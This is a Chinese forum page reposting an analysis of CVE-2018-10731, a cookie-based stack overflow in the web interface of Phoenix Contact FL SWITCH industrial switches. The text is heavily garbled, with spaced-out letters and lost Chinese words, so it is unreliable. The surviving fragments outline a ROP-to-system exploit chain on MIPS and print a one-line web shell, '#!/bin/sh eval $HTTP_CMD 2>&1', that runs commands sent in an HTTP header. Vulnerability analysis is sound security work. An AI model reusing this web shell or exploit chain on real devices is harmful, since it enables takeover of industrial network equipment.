[15519] 2020-06-21_CVE-2018-10731:工业交换机漏洞分析

文档创建者:s7ckTeam
浏览次数:10
最后更新:2025-01-18
2020-06-21_CVE-2018-10731:工业交换机漏洞分析 C V E - 2 0 1 8 - 1 0 7 3 1 b e y 0 n d   F r e e B u f   2 0 2 0 - 0 6 - 2 1 P h o e n i x   C o n t a c t F L   S W I T C H   3 x x x F L   S W I T C H   4 x x x F L   S W I T C H   4 8 x x C V E - 2 0 1 8 - 1 0 7 3 1   W e b C V S S 3 . 0 9 L i n u x 使 w e b I o T w e b H T T P   C G I C G I 使 c g i c   使   H T T P H T T P w e b     C G I           C G I 1 .         H T T P m a i n 使 C o o k i e 2 .   m a i n 使   c o o k i e   0 x 8 0 0 x E 0 l i b i p i n f u s i o n w e b . s o l i b i p i n f u s i o n w e b m a i n m a i n c g i M a i n l i b i p i n f u s i o n w e b g e t _ l o g i n _ u s e r g e t _ l o g i n _ u s e r c o o k i e s _ g e t _ v a l u e c _ s e s s i o n l o c a l _ e 0 l o c a l _ e 0
3 .     g e t _ l o g i n _ u s e r   使 c o o k i e 0 x 4 0 0 4 .     c o o k i e s _ g e t _ v a l u e 0 x E 0 2 2 4 c o o k i e 使 s h e l l c o d e 使 c o o k i e s _ g e t _ v a l u e c g i C o o k i e S t r i n g g e t _ l o g i n _ u s e r l o c a l _ e 0
0 x 4 0 0 - 0 x E 0   = 8 0 0 N X M I P S 使 s t r c p y   使 使   R O P R O P   g a d g e t s 使 使   s t r c p y R O P g a d g e t s l i b i p i n f u s i o n w e b 5 .     l i b i p i n f u s i o n w e b $ s 0 使 使 O S L i n u x s y s t e m   g e t _ l o g i n _ u s e r   g e t _ l o g i n _ u s e r $ s 0 0 x D 8   使   O S 6 .     g e t _ l o g i n _ u s e r O S m y s y s t e m O S 5 7 .   s h e l l   s h e l l A S L R 使 g a d g e t O S m y s y s t e m m y s y s t e m c _ s e s s i o n   c o o k i e
8 .   A S L R w e b   s h e l l C G I   C G I H T T P H T T P _ C G I   s h e l l   使 e v a l   H T T P   C M D 使 s h e l l   l s   9 .     l s h t t p s : / / h a b r . c o m / r u / c o m p a n y / p t / b l o g / 4 9 3 9 4 4 / * b e y 0 n d F r e e B u f . C O M # ! / b i n / s h e v a l   $ H T T P _ C M D   2 > & 1

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则